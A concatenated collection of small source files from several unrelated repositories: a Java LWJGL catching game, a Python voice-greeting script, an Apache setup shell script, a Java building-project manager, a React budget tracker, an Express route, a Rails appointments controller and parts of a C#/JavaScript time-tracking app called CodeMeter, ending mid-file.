if (Keyboard.isKeyDown(Keyboard.KEY_D)) {
((MainHero) GamePanel.hero).update(1, 0);
}
if (Keyboard.isKeyDown(Keyboard.KEY_W)) {
((MainHero) GamePanel.hero).update(0, -1);
}
if (Keyboard.isKeyDown(Keyboard.KEY_S)) {
((MainHero) GamePanel.hero).update(0, 1);
}
}
}
<file_sep>package by.ansgar.catcher2d.entity;
import static org.lwjgl.opengl.GL11.*;
import java.awt.Rectangle;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.IOException;
import org.newdawn.slick.opengl.Texture;
import org.newdawn.slick.opengl.TextureLoader;
import by.ansgar.catcher2d.main.GamePanel;
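/**
 * The player-controlled entity: tracks position, speed and size, draws itself
 * as a textured quad, and checks collisions against other game objects.
 */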
public class MainHero implements GameObject {
private int health;
private double x;
private double y;
private int speed;
private double r;
private Rectangle size = new Rectangle();
public MainHero() {
x = GamePanel.WIDTH / 2 - 25;
y = GamePanel.HEIGHT - 55;
speed = 3;
r = 50.0;
}
public void update(int dx, int dy) {
x += dx * speed;
y += dy * speed;
}
public void moving() {
if (x < 0) x = 0;
if (x > (GamePanel.WIDTH - 50)) x = GamePanel.WIDTH - 50;
if (y < 5) y = 5;
if (y > (GamePanel.HEIGHT - 55)) y = GamePanel.HEIGHT - 55;
}
public Texture loadTexture(String key) {
try {
return TextureLoader.getTexture("PNG", new FileInputStream(
new File("res/sprites/hero/man.png")));
} catch (FileNotFoundException e) {
e.printStackTrace();
} catch (IOException e) {
e.printStackTrace();
}
return null;
}
public void draw() {
glBegin(GL_QUADS);
glTexCoord2f(0, 0);
glVertex2d(x, y);
glTexCoord2f(1, 0);
glVertex2d(x + r, y);
glTexCoord2f(1, 1);
glVertex2d(x + r, y + r);
glTexCoord2f(0, 1);
glVertex2d(x, y + r);
glEnd();
}
    public boolean intersects(GameObject entity) {
        // Compare this hero's bounds with the other entity's position, not with our own.
        size.setBounds((int) x, (int) y, 50, 50);
        return size.intersects(entity.getX(), entity.getY(), 50, 50);
    }
public int getHealth() {
return health;
}
public void setHealth(int health) {
this.health = health;
}
public int getSpeed() {
return speed;
}
public void setSpeed(int speed) {
this.speed = speed;
}
public double getX() {
return x;
}
public void setX(double x) {
this.x = x;
}
public double getY() {
return y;
}
public void setY(double y) {
this.y = y;
}
public void setR(double r) {
this.r = r;
}
public double getR() {
return r;
}
}
<file_sep>package by.ansgar.catcher2d.entity;
import static org.lwjgl.opengl.GL11.*;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.IOException;
import org.newdawn.slick.opengl.Texture;
import org.newdawn.slick.opengl.TextureLoader;
import by.ansgar.catcher2d.main.GamePanel;
public class Background implements GameObject {
private double x;
private double y;
public Background(){
x = 0;
y = 0;
}
public void update(int dx, int dy) {
}
public void draw() {
glBegin(GL_QUADS);
glTexCoord2f(0, 0);
glVertex2d(x, y);
glTexCoord2f(1, 0);
glVertex2d(x + GamePanel.WIDTH, y);
glTexCoord2f(1, 1);
glVertex2d(x + GamePanel.WIDTH, y + GamePanel.WIDTH);
glTexCoord2f(0, 1);
glVertex2d(x, y + GamePanel.WIDTH);
glEnd();
}
public void moving() {
}
public Texture loadTexture(String key) {
try {
return TextureLoader.getTexture("PNG", new FileInputStream(
new File("res/sprites/background/backgroundImage.png")));
} catch (FileNotFoundException e) {
e.printStackTrace();
} catch (IOException e) {
e.printStackTrace();
}
return null;
}
public boolean intersects(GameObject entity) {
return false;
}
    @Override
    public double getX() {
        return x;
    }
    @Override
    public double getY() {
        return y;
    }
@Override
public void setX(double x) {
this.x = x;
}
@Override
public void setY(double y) {
this.y = y;
}
@Override
public void setR(double r) {
// TODO Auto-generated method stub
}
@Override
public double getR() {
// TODO Auto-generated method stub
return 0;
}
}
<file_sep>package by.ansgar.catcher2d.main;
import static org.lwjgl.opengl.GL11.*;
import java.util.ArrayList;
import java.util.List;
import java.util.Random;
import org.lwjgl.LWJGLException;
import org.lwjgl.Sys;
import org.lwjgl.input.Keyboard;
import org.lwjgl.opengl.Display;
import org.lwjgl.opengl.DisplayMode;
import org.newdawn.slick.opengl.Texture;
import by.ansgar.catcher2d.entity.Background;
import by.ansgar.catcher2d.entity.Enemy;
import by.ansgar.catcher2d.entity.GameObject;
import by.ansgar.catcher2d.entity.MainHero;
import by.ansgar.catcher2d.util.Input;
public class GamePanel {
public static final int WIDTH = 750;
public static final int HEIGHT = 550;
private long lastFrame;
public static GameObject hero, enemy;
// public static MainHero hero;
// public static Enemy enemy;
public static List<Enemy> enemys;
private Input input;
private Background background;
Texture heroSprite, enemySprite, backgroundImage;
public GamePanel() {
hero = new MainHero();
enemy = new Enemy();
enemys = new ArrayList<Enemy>();
input = new Input();
background = new Background();
enemys.add(new Enemy());
try {
Display.setDisplayMode(new DisplayMode(WIDTH, HEIGHT));
Display.setTitle("Catcher2d");
Display.create();
} catch (LWJGLException e) {
e.printStackTrace();
}
heroSprite = hero.loadTexture("heroSprite");
enemySprite = enemy.loadTexture("enemySprite");
backgroundImage = background.loadTexture("backgroundImage");
glMatrixMode(GL_PROJECTION);
glLoadIdentity();
glOrtho(0, WIDTH, HEIGHT, 0, 1, -1);
glMatrixMode(GL_MODELVIEW);
glEnable(GL_TEXTURE_2D);
lastFrame = getTime();
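        // Main game loop: poll input, update entities, redraw, then sync to 60 FPS.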
while (!Display.isCloseRequested()) {
glClear(GL_COLOR_BUFFER_BIT);
input();
update();
draw();
// System.out.println(getDelta());
Display.update();
Display.sync(60);
}
Display.destroy();
}
private void input() {
// KeyBoarder
input.input();
input.moveHero();
}
private void update() {
// Enemy
for (int i = 0; i < enemys.size(); i++) {
enemys.get(i).update();
enemys.get(i).moving();
// System.out.println("Hero y =" + (int)hero.getY());
// System.out.println("Enemy y =" + (int)enemys.get(i).getY());
// if ((int)hero.getY() == (int)enemys.get(i).getY() && (int)hero.getX() == (int)enemys.get(i).getX()) {
// System.out.println("You are dead!");
// }
                if (enemys.get(i).intersects(hero)) {
                    System.out.println("Caught one!");
                    enemys.remove(i);
                    i--; // step back so the enemy shifted into this slot is not skipped
                    hero.setR(hero.getR() + 0.1);
                    System.out.println(hero.getR());
                }
}
// Player
hero.moving();
}
private void draw() {
//Background
backgroundImage.bind();
background.draw();
// Enemy
enemySprite.bind();
for (int i = 0; i < enemys.size(); i++) {
enemys.get(i).draw();
}
// Player
heroSprite.bind();
hero.draw();
}
private long getTime(){
return (Sys.getTime() * 1000) / Sys.getTimerResolution();
}
private int getDelta(){
long currentTime = getTime();
int delta =(int) (currentTime - lastFrame);
lastFrame = getTime();
return delta;
}
}
|
9a2a3be33e6f76fd217e16e7595b79c3e7a249b6
|
[
"Java"
] | 5
|
Java
|
kirilamenski/Catcher2D-LWJGL-
|
831acc20a2effd650a11d552c2ac5a6b2769b095
|
02452ccc7b4557b29e76155acb1134cf8efe71b8
|
refs/heads/master
|
<file_sep>import pyttsx3
import datetime
import speech_recognition as sr
engine = pyttsx3.init('sapi5')
voices = engine.getProperty('voices')
engine.setProperty('voice',voices[0].id)
def speak(audio):
engine.say(audio)
engine.runAndWait()
def wishMe():
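    """Greet the user according to the current time of day."""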
hour = int(datetime.datetime.now().hour)
if hour >= 0 and hour <12:
speak("good morning sir")
    elif hour >= 12 and hour < 18:
speak("good afternoon sir")
else:
speak("Good evening sir")
speak("i am Domdoo 1 point o")
def takeCommand():
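    """Listen on the default microphone and return the phrase recognized by
    Google Speech Recognition, or the string "None" when recognition fails."""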
r = sr.Recognizer()
with sr.Microphone() as source:
print("Listening...")
r.pause_threshold = 1
audio = r.listen(source)
try:
print("Recognizing...")
query = r.recognize_google(audio, language = 'en-in')
print("User said : " , query )
except Exception as e:
# print(e)
print("say that again please...")
return"None"
return query
if __name__ == "__main__" :
wishMe()
takeCommand()
|
42fc2a3d24b4d5626cbf0c36b9fa92077caa4b25
|
[
"Python"
] | 1
|
Python
|
Vishal-Saroj/DomdooUsingPython
|
d2e00a6d3fb08597ffca27705e75443d67a5427a
|
3a4c4079d68f9300a79b23a709e3dacd0bec9dfe
|
refs/heads/master
|
<file_sep>#!/bin/bash
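# Provision Apache on an Amazon Linux instance and publish a static test page.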
sudo yum update -y
sudo yum install -y httpd
sudo bash -c 'cat << EOF > /var/www/html/index.html
<HTML>
<HEAD>
<TITLE>
Hello World
</TITLE>
</HEAD>
<BODY>
<H1>TEST</H1>
<P>This is test "hello world" HTML document.</P>
</BODY>
</HTML>
EOF'
sudo systemctl restart httpd
sudo systemctl enable httpd
|
863c9978dbfb1b702e17fd6feb462672ee1bb478
|
[
"Shell"
] | 1
|
Shell
|
barkayw/hello-world-html
|
41561240ed84e63b55ab2b240b100d06709f41dc
|
55236f067617b39bfa57f7d5e2aa8db988d3741a
|
refs/heads/main
|
<file_sep># Capstone-Project-Manager
This project is a building project manager used to save building and employee details.
## How to use
The user must input project details such as building type, erf number and cost, plus employee details such as names, numbers and emails.
All info will be saved and a receipt will be printed out.
<file_sep>import java.util.Scanner;
public class projectManager {
public static void main(String[] args) {
// gets all project info
Scanner input = new Scanner(System.in);
System.out.println("Project Number: ");
int projectNum = input.nextInt();
input = new Scanner(System.in);
System.out.println("Project Name: ");
String projectName = input.nextLine();
System.out.println("Project Build Type: ");
String buildType = input.nextLine();
System.out.println("Project Address: ");
String projectAddress = input.nextLine();
System.out.println("Project Erf Number: ");
int erfNum = input.nextInt();
System.out.println("Project Total Fee: ");
double totalFee = input.nextDouble();
System.out.println("Project Amount Paid to date: ");
double paid = input.nextDouble();
input = new Scanner(System.in);
System.out.println("Project Deadline: ");
String deadline = input.nextLine();
// gets all Architect info
System.out.println("Please enter Architect surname: ");
String SurnameA = input.nextLine();
System.out.println("Please enter Architect name: ");
String NameA = input.nextLine();
System.out.println("Please enter Architect telephone number: ");
int TelephoneA = input.nextInt();
input = new Scanner(System.in);
System.out.println("Please enter Architect email: ");
String EmailA = input.nextLine();
System.out.println("Please enter Architect Address: ");
String AddressA = input.nextLine();
Architect architect = new Architect(SurnameA, NameA, TelephoneA, EmailA, AddressA);// creates Architect
// gets all contractor info
System.out.println("Please enter contractor surname: ");
String surnameC = input.nextLine();
System.out.println("Please enter contractor name: ");
String nameC = input.nextLine();
System.out.println("Please enter contractor telephone number: ");
int telephoneC = input.nextInt();
input = new Scanner(System.in);
System.out.println("Please enter contractor email: ");
String emailC = input.nextLine();
System.out.println("Please enter contractor Address: ");
String addressC = input.nextLine();
Contractor contractor = new Contractor(surnameC, nameC, telephoneC, emailC, addressC); // creates contractor
System.out.println("Please enter Customer surname: ");
String surname = input.nextLine();
System.out.println("Please enter Customer name: ");
String name = input.nextLine();
System.out.println("Please enter Customer telephone number: ");
int telephone = input.nextInt();
input = new Scanner(System.in);
System.out.println("Please enter Customer email: ");
String email = input.nextLine();
System.out.println("Please enter Customer Address: ");
String address = input.nextLine();
Customer customer = new Customer(surname, name, telephone, email, address); // creates Customer
// creates project
projectObject projectOne = new projectObject(projectNum, projectName, buildType, projectAddress, erfNum, totalFee, paid, deadline, architect, contractor, customer);
System.out.println(projectOne);
// user input for a choice to pick between the if statements
System.out.println("""
enter 1 :to Change the due date of the project.
enter 2 :to Change fee paid to date.
enter 3 :to Update a contractor contact details
enter 4:to Finalise the project""");
Scanner inputChoice = new Scanner(System.in);
int choice = inputChoice.nextInt();
if (choice == 1) {//Changes the due date
Scanner inputD = new Scanner(System.in);
System.out.println("new: ");
String newDeadline = inputD.nextLine();
projectOne.setDeadline(newDeadline);
System.out.println("Changes have been made.\n");
System.out.println(projectOne);
}
if (choice == 2) {//Changes fee paid to date
Scanner inputP = new Scanner(System.in);
System.out.println("new: ");
double newP = inputP.nextDouble();
projectOne.setPaid(newP);
System.out.println("Changes have been made.\n");
System.out.println(projectOne);
}
        if (choice == 3) {//Changes contractor contact details
            // Choice2 picks which contact detail to edit from the contractor
            System.out.println("""
                    enter 1 :to Change Email
                    enter 2 :to Change Telephone number
                    enter 3 :to Change address""");
            Scanner inputChoice2 = new Scanner(System.in);
            int choice2 = inputChoice2.nextInt();
if (choice2 == 1) {
Scanner inputE = new Scanner(System.in);
System.out.println("new: ");
String newE = inputE.nextLine();
contractor.setEmailC(newE);
System.out.println("Changes have been made.\n");
System.out.println(projectOne);
}
if (choice2 == 2) {
Scanner inputT = new Scanner(System.in);
System.out.println("new: ");
int newT = inputT.nextInt();
contractor.setTelephoneC(newT);
System.out.println("Changes have been made.\n");
System.out.println(projectOne);
}
if (choice2 == 3) {
Scanner inputA = new Scanner(System.in);
System.out.println("new: ");
String newA = inputA.nextLine();
contractor.setAddressC(newA);
System.out.println("Changes have been made.\n");
System.out.println(projectOne);
}
}
if (choice == 4) {// prints invoice
System.out.println("Invoice:");
System.out.println(customer.toString());
if (totalFee != paid){
double invoice = totalFee - paid;
System.out.println("customer must still pay:" + invoice);
}
}
}
}
<file_sep>class projectObject {
// attributes
private int projectNum;
private String projectName;
private String buildType;
private String projectAddress;
private int erfNum;
private double totalFee;
private double paid;
private String deadline;
private Architect architect;
private Contractor contractor;
private Customer customer;
// Create the constructor of the object to save initial values
public projectObject(int projectNum, String projectName, String buildType, String projectAddress, int erfNum, double totalFee, double paid, String deadline, Architect architect, Contractor contractor, Customer customer) {
this.projectNum = projectNum;
this.projectName = projectName;
this.buildType = buildType;
this.projectAddress = projectAddress;
this.erfNum = erfNum;
this.totalFee = totalFee;
this.paid = paid;
this.deadline = deadline;
this.architect = architect;
this.contractor = contractor;
this.customer = customer;
}
// setters
public void setProjectNum(int newNum) {
projectNum = newNum;
}
public void setProjectName(String newName) {
projectName = newName;
}
public void setBuildType(String newBuildType) {
buildType = newBuildType;
}
public void setProjectAddress(String newAddress) {
projectAddress = newAddress;
}
public void setProjectErfNum(int newErfNum) {
erfNum = newErfNum;
}
public void setTotalFee(double newTotalFee) {
totalFee = newTotalFee;
}
public void setPaid(double newPaid) {
paid = newPaid;
}
public void setDeadline(String newDeadline) {
deadline = newDeadline;
}
// toString method to print information to screen
public String toString() {
String output ="\nProject Number: " + projectNum+
"\nProject Name: " + projectName +
"\nBuilding Type: " + buildType+
"\nProject Address: " + projectAddress+
"\nErf Num: " + erfNum+
"\nTotal Fee: " +totalFee+
"\nAmount Paid: " + paid+
"\nErf Num: " + erfNum+
"\nDeadline: " + deadline+
"\n"+
"\n" + architect+
"\n"+
"\n" + contractor+
"\n"+
"\n" + customer;
return output;
}
}
|
09da38920e8f5a638de870433ce83b9eeac08779
|
[
"Markdown",
"Java"
] | 3
|
Markdown
|
cloudeuz/Capstone-Project-Manager
|
c5e38ad14d6e1ef5e05059a7d4cf99a2d6dfc903
|
bd5de8352de32897be5dac28390ffb294d6005dd
|
refs/heads/main
|
<file_sep>var express = require('express');
var router = express.Router();
/* GET home page. */
router.get('/', function(req, res, next) {
var name1 = 'Niraj3';
var datajson = { title: 'Express3', loginname: name1 };
res.render('index', datajson);
});
module.exports = router;
|
8f1e5c082023d14765b0b7deed6415bb1df1a835
|
[
"JavaScript"
] | 1
|
JavaScript
|
NirajChamp/myExpressApp
|
d34e86c104894e3fbe5bc708124c4cff3da58aef
|
a030a90ce3ed79b21cc1583a69f29c7798a9c102
|
refs/heads/master
|
<repo_name>GastonLell/budget-control<file_sep>/src/components/ExpenseItem/ExpenseItem.js
import { Stack, Text } from "@chakra-ui/react";
import PropTypes from 'prop-types';
const ExpenseItem = ({description, count}) => {
return(
<Stack d="flex" direction="row" justifyContent="space-between" p={2} borderBottom="1px" borderColor="gray.300">
<Text>{description}</Text>
<Text>{count}</Text>
</Stack>
)
}
ExpenseItem.propTypes = {
description: PropTypes.string.isRequired,
count: PropTypes.number.isRequired,
}
export default ExpenseItem;<file_sep>/src/App.js
import { useEffect, useState } from "react";
import { ChakraProvider, Stack, Text } from "@chakra-ui/react";
import ExpenseForm from "./components/ExpenseForm/ExpenseForm";
import InitialBudget from "./components/InitialBudget/InitialBudget";
import ExpenseList from "./components/ExpenseList/ExpenseList";
import BudgetControl from "./components/BudgetControl/BudgetControl";
function App() {
  // budget
const [budget, setBudget] = useState(0);
  // remaining budget
const [remainingBudget, setRemainingBudget] = useState(0);
  // whether to show the initial budget question
const [showQuestion, setShowQuestion] = useState(true);
  // expenses
const [expense, setExpense] = useState([]);
  // useEffect flag for creating expenses
const [createdSpeading, setCreatespeading] = useState(false);
const [speading, setSpeading] = useState({});
  // toggle between the expense list and the budget detail
const [detail, setDetail] = useState(false);
useEffect(() => {
if (createdSpeading) {
      // add the new expense
setExpense([...expense, speading]);
      // update the remaining budget
setRemainingBudget(remainingBudget - speading.count);
      // reset the flag to false
setCreatespeading(false);
}
}, [speading, createdSpeading, remainingBudget, expense]);
return (
<ChakraProvider>
<Stack bgGradient="linear(to-t, white, blue.900)" h="100vh">
<Stack>
<Text
textAlign="center"
fontSize={{base: "5xl" ,md: "6xl"}}
color="white"
fontWeight="200"
p={{base: 2, md: 4}}
>
<NAME>
</Text>
</Stack>
{showQuestion ? (
<Stack>
<InitialBudget
setBudget={setBudget}
setRemainingBudget={setRemainingBudget}
setShowQuestion={setShowQuestion}
/>
</Stack>
) : (
<Stack
bg="whiteAlpha.900"
d="flex"
direction={{base: "column", md: "row"}}
w={{base: "90%" ,md: "70%"}}
mx="auto !important"
p={{base: 4 ,md: 6}}
>
<Stack w="100%">
<ExpenseForm
setSpeading={setSpeading}
setCreatespeading={setCreatespeading}
/>
</Stack>
<Stack w="100%">
<Text
fontSize="4xl"
color="gray"
fontWeight="200"
textAlign="center"
mb={2}
>
Ver detalles
</Text>
{detail ? (
<BudgetControl
setDetail={setDetail}
budget={budget}
remainingBudget={remainingBudget}
/>
) : (
<ExpenseList setDetail={setDetail} expense={expense} />
)}
</Stack>
</Stack>
)}
</Stack>
</ChakraProvider>
);
}
export default App;
<file_sep>/src/components/ExpenseForm/ExpenseForm.js
import React, { useState } from "react";
// used to generate unique ids
import shortid from "shortid";
// Chakra UI components
import {
Text, Stack,
Input, Button,
FormControl, FormLabel,
Alert, AlertIcon
} from "@chakra-ui/react";
// component prop documentation
import PropTypes from 'prop-types';
const ExpenseForm = ({setSpeading, setCreatespeading}) => {
const [description, setDescription] = useState("")
const [count, setCount] = useState("")
const [error, setError] = useState(false)
const handleSubmit = (e) => {
e.preventDefault();
    // validate
if(count < 1 || isNaN(count) || description.trim() === "") {
setError(true);
return;
}
    // validation passed
setError(false);
const spending = {
description,
count,
id: shortid.generate(),
}
    // save the expense
setSpeading(spending);
setCreatespeading(true)
    // reset the form
setDescription("");
setCount(0);
};
return (
<Stack w="100%" borderRadius={6}>
<Text
fontSize="4xl"
color="gray"
fontWeight="200"
textAlign="center"
mb={2}
>
Agregar tus gastos
</Text>
<form onSubmit={handleSubmit}>
<Stack spacing={6}>
<FormControl>
<FormLabel>Nombre gasto</FormLabel>
<Input
type="text"
placeholder="Ej. Transporte"
value={description}
onChange={(e) => setDescription(e.target.value)}
/>
</FormControl>
<FormControl>
<FormLabel>Cantidad gasto</FormLabel>
<Input
type="number"
placeholder="Ej. Transporte"
value={count}
onChange={(e) => setCount(parseInt(e.target.value))}
/>
</FormControl>
<Button colorScheme="twitter" type="submit">
Agregar gasto
</Button>
</Stack>
</form>
{error ? (
<Alert status="error">
<AlertIcon />
por favor, revise sus campos
</Alert>
) : null
}
</Stack>
);
};
ExpenseForm.propTypes = {
setSpeading: PropTypes.func.isRequired,
setCreatespeading: PropTypes.func.isRequired,
}
export default ExpenseForm;
<file_sep>/src/components/ExpenseList/ExpenseList.js
import { Button, Stack } from "@chakra-ui/react";
import ExpenseItem from '../ExpenseItem/ExpenseItem';
import PropTypes from 'prop-types';
const ExpenseList = ({expense, setDetail }) => {
return(
<Stack w="100%">
<Button variant="outline" colorScheme="linkedin" onClick={() => setDetail(true)}>Ver presupuesto</Button>
{
expense.map(spending => <ExpenseItem key={spending.id} {...spending }/>)
}
</Stack>
)
}
ExpenseList.propTypes = {
expense: PropTypes.array.isRequired,
setDetail: PropTypes.func.isRequired
}
export default ExpenseList;
|
604c5628c58486020843e2d47443c42df9009e13
|
[
"JavaScript"
] | 4
|
JavaScript
|
GastonLell/budget-control
|
406cad060fa4fa68132a6fb7fd0b546b066ecca2
|
e8ee6e124a32dbe5a744b1a5feee7fcec4c41fb4
|
refs/heads/master
|
<file_sep>class AppointmentsController < ApplicationController
before_action :set_appointment, only: [:show, :edit, :update, :destroy]
before_action :set_objects
# GET /appointments
# GET /appointments.json
def index
@appointments = Appointment.all
end
# GET /appointments/1
# GET /appointments/1.json
def show
@patient_name = Patient.find(@appointment.patient_id).name
@physician_name = Physician.find(@appointment.physician_id).name
end
# GET /appointments/new
def new
@appointment = Appointment.new
end
# GET /appointments/1/edit
def edit
end
# POST /appointments
# POST /appointments.json
def create
Rails.logger.debug "appointment_params is #{appointment_params.inspect}"
@appointment = Appointment.new(appointment_params)
Rails.logger.debug "@appointment set to #{@appointment.inspect}"
respond_to do |format|
if @appointment.save
format.html { redirect_to @appointment, notice: 'appointment was successfully created.' }
format.json { render action: 'show', status: :created, location: @appointment }
else
format.html { render action: 'new' }
format.json { render json: @appointment.errors, status: :unprocessable_entity }
end
end
end
# PATCH/PUT /appointments/1
# PATCH/PUT /appointments/1.json
def update
respond_to do |format|
if @appointment.update(appointment_params)
format.html { redirect_to @appointment, notice: 'appointment was successfully updated.' }
format.json { head :no_content }
else
format.html { render action: 'edit' }
format.json { render json: @appointment.errors, status: :unprocessable_entity }
end
end
end
# DELETE /appointments/1
# DELETE /appointments/1.json
def destroy
Rails.logger.debug ">>>>>>> entred appointment destroy"
@appointment.destroy
respond_to do |format|
format.html { redirect_to appointments_url }
format.json { head :no_content }
end
end
private
# Use callbacks to share common setup or constraints between actions.
def set_appointment
@appointment = Appointment.find(params[:id])
end
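    # Preload [name, id] pairs for the patient and physician select boxes.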
def set_objects
@patients = Patient.all.map{ |p| [p.name, p.id]}
@physicians = Physician.all.map{ |p| [p.name, p.id]}
end
# Never trust parameters from the scary internet, only allow the white list through.
def appointment_params
params.require(:appointment).permit(:appointment_date, :patient_id, :physician_id)
end
end
|
61f0f06013144b6fa72f88706ab2a18dd8d8e561
|
[
"Ruby"
] | 1
|
Ruby
|
pchhatwal/sandbox
|
03c67d9b9975fe1d1cda472d52463f1dc01991c3
|
01748e1dde892f6937c31c9cd45318cc2173ee6e
|
refs/heads/master
|
<repo_name>TechLord-Forever/codemeter<file_sep>/CodeMeter/CodeMeter.HttpService/Migrations/Configuration.cs
namespace CodeMeter.HttpService.Migrations
{
using System;
using System.Data.Entity;
using System.Data.Entity.Migrations;
using System.Linq;
internal sealed class Configuration : DbMigrationsConfiguration<CodeMeter.HttpService.Models.DataContext>
{
public Configuration()
{
AutomaticMigrationsEnabled = true;
ContextKey = "CodeMeter.HttpService.Models.DataContext";
}
protected override void Seed(CodeMeter.HttpService.Models.DataContext context)
{
// This method will be called after migrating to the latest version.
// You can use the DbSet<T>.AddOrUpdate() helper extension method
// to avoid creating duplicate seed data. E.g.
//
// context.People.AddOrUpdate(
// p => p.FullName,
// new Person { FullName = "<NAME>" },
// new Person { FullName = "<NAME>" },
// new Person { FullName = "<NAME>" }
// );
//
//context.Configurations.Add(new Models.Configuration()
//{
// CheckRunning = true,
// CheckInterval = 1,
// NotificationInterval = 15,
// Recepient = "<EMAIL>",
// Sender = "<EMAIL>",
// SendEmail = true,
// Smtp = "mail.brizb.rs",
// Port = 26,
// Username = "<EMAIL>",
// Password = "<PASSWORD>"
//});
}
}
}
<file_sep>/CodeMeter/CodeMeter.Client/app/viewmodels/task.js
define(["jquery", "knockout", "durandal/app", "durandal/system", "plugins/router", "services/data", "komapping"], function ($, ko, app, system, router, data, mapper) {
var
// Properties
task = mapper.fromJS({
ID: 0,
ProjectID: 0,
Name: '',
Description: ''
}),
        isBusy = ko.observable(false),
// Handlers
save = function () {
isBusy(true);
if (!task.ID()) {
data.insertTask(task).done(function (id) {
task.ID(id);
}).fail(function () {}).always(function () {
isBusy(false);
})
} else {
data.updateTask(task).done(function () {
}).fail(function () {}).always(function () {
isBusy(false);
});
}
},
// Lifecycle
activate = function (projectId, taskId) {
if (taskId) {
return data.getTask(taskId).done(function (t) {
mapper.fromJS(t, task);
}).fail(function () {});
} else {
mapper.fromJS({
ID: 0,
ProjectID: projectId,
Name: '',
Description: ''
}, task);
}
},
deactivate = function () {};
return {
// Place your public properties here
task: task,
isBusy: isBusy,
save: save,
activate: activate,
deactivate: deactivate
};
});<file_sep>/README.md
codemeter
=========
<file_sep>/CodeMeter/CodeMeter.Client/app/utils/utils.js
define(function () {
var formatTime = function (timeDiff) {
var seconds = Math.round(timeDiff % 60);
timeDiff = Math.floor(timeDiff / 60);
var minutes = Math.round(timeDiff % 60);
timeDiff = Math.floor(timeDiff / 60);
var hours = Math.round(timeDiff % 24);
return (hours < 10 ? "0" + hours : hours) + ":" + (minutes < 10 ? "0" + minutes : minutes) + ":" + (seconds < 10 ? "0" + seconds : seconds);
};
return {
formatTime: formatTime,
}
});<file_sep>/CodeMeter/CodeMeter.HttpService/Controllers/ProjectsController.cs
using System;
using System.Collections.Generic;
using System.Data.Entity;
using System.Linq;
using System.Net;
using System.Net.Http;
using System.Web.Http;
using System.Web.Http.Cors;
using CodeMeter.HttpService.Models;
namespace CodeMeter.HttpService.Controllers
{
[EnableCors("*", "*", "*")]
public class ProjectsController : ApiController
{
public IList<Project> Get()
{
using (var c = new DataContext())
{
var projects = c.Projects.Include(x => x.Tasks).Include(x => x.Tasks.Select(t => t.Logs)).ToArray();
foreach (var project in projects)
{
project.SetTotals();
project.Tasks = null;
}
return projects;
}
}
public Project Get(int id)
{
using (var c = new DataContext())
{
return c.Projects.Single(x => x.ID == id);
}
}
public HttpResponseMessage Post(HttpRequestMessage request, Project project)
{
using (var c = new DataContext())
{
project.Guid = Guid.NewGuid();
c.Projects.Add(project);
c.SaveChanges();
}
var response = request.CreateResponse(HttpStatusCode.Created, project.ID);
return response;
}
public void Put(Project project)
{
using (var c = new DataContext())
{
c.Entry(project).State = EntityState.Modified;
c.SaveChanges();
}
}
public void Delete(int id)
{
using (var c = new DataContext())
{
c.Entry(new Project() { ID = id }).State = EntityState.Deleted;
c.SaveChanges();
}
}
}
}
<file_sep>/CodeMeter/CodeMeter.HttpService/Global.asax.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.Http;
using System.Web.Mvc;
using System.Web.Optimization;
using System.Web.Routing;
using CodeMeter.HttpService.Models;
using CodeMeter.HttpService.Quartz;
using Quartz;
using Quartz.Impl;
namespace CodeMeter.HttpService
{
// Note: For instructions on enabling IIS6 or IIS7 classic mode,
// visit http://go.microsoft.com/?LinkId=9394801
public class WebApiApplication : System.Web.HttpApplication
{
protected void Application_Start()
{
AreaRegistration.RegisterAllAreas();
WebApiConfig.Register(GlobalConfiguration.Configuration);
FilterConfig.RegisterGlobalFilters(GlobalFilters.Filters);
RouteConfig.RegisterRoutes(RouteTable.Routes);
BundleConfig.RegisterBundles(BundleTable.Bundles);
using (var c = new DataContext())
{
var cfg = c.Configurations.Single();
var scheduler = StdSchedulerFactory.GetDefaultScheduler();
scheduler.Start();
var job = JobBuilder.Create<CheckJob>().WithIdentity("Check").Build();
var trigger =
TriggerBuilder.Create()
.WithIdentity("trigger")
.WithSimpleSchedule(s => s.WithIntervalInMinutes(cfg.CheckInterval).RepeatForever())
.StartAt(DateTime.Now.AddMinutes(cfg.CheckInterval))
.Build();
scheduler.ScheduleJob(job, trigger);
}
}
}
}<file_sep>/CodeMeter/CodeMeter.HttpService/Models/TaskLog.cs
using System;
namespace CodeMeter.HttpService.Models
{
public class TaskLog : Entity
{
public Task Task { get; set; }
public int TaskID { get; set; }
public DateTime? Start { get; set; }
public DateTime? End { get; set; }
//public int Elapsed
//{
// get
// {
// if (!Start.HasValue) return 0;
// var end = End.HasValue ? End.Value : DateTime.Now;
// return (int)end.Subtract(Start.Value).TotalSeconds;
// }
//}
}
}<file_sep>/CodeMeter/CodeMeter.HttpService/Models/Project.cs
using System;
using System.Collections.Generic;
using System.ComponentModel.DataAnnotations;
using System.ComponentModel.DataAnnotations.Schema;
using System.Linq;
namespace CodeMeter.HttpService.Models
{
public class Project : Entity
{
public Guid Guid { get; set; }
[Required]
[StringLength(256)]
public string Name { get; set; }
[StringLength(256)]
public string Client { get; set; }
[StringLength(2048)]
public string Description { get; set; }
public ICollection<Task> Tasks { get; set; }
[Range(0, 1000)]
public int Price { get; set; }
[NotMapped]
public int TotalTime { get; set; }
[NotMapped]
public decimal Total { get; set; }
public void SetTotals()
{
if (Tasks == null) return;
foreach (var task in Tasks)
{
task.SetStartAndEnd();
}
TotalTime = Tasks.Sum(x => x.ElapsedSeconds);
Total = Price*TotalTime/3600M;
}
}
}<file_sep>/CodeMeter/CodeMeter.Client/app/services/data.js
define(['plugins/http'], function(http) {
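    // Thin wrapper around the CodeMeter HTTP API; every method returns a
    // promise from Durandal's http plugin.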
//var url = "http://localhost:52214/api/";
var url = "http://codemeter.brizb.rs/api/";
return {
getProjects: function() {
return http.get(url + 'projects');
},
getProject: function(id) {
return http.get(url + 'projects', {id: id});
},
saveProject: function(project) {
return http.post(url + 'projects', project);
},
updataProject: function(project) {
return http.put(url + 'projects', project);
},
deleteProject: function(id) {
return http.remove(url + 'projects/' + id);
},
getTasks: function(projectId) {
return http.get(url + 'project/' + projectId + '/tasks');
},
getTask: function(taskId) {
return http.get(url + 'project/0/tasks/' + taskId);
},
getLastTaskRun: function (taskId) {
return http.get(url + 'task/lastRun/' + taskId);
},
insertTask: function (task) {
return http.post(url + 'project/' + task.ProjectID() + '/tasks/', task);
},
updateTask: function (task) {
return http.put(url + 'project/' + task.ProjectID() + '/tasks/' + task.ID(), task);
},
deleteTask: function (id) {
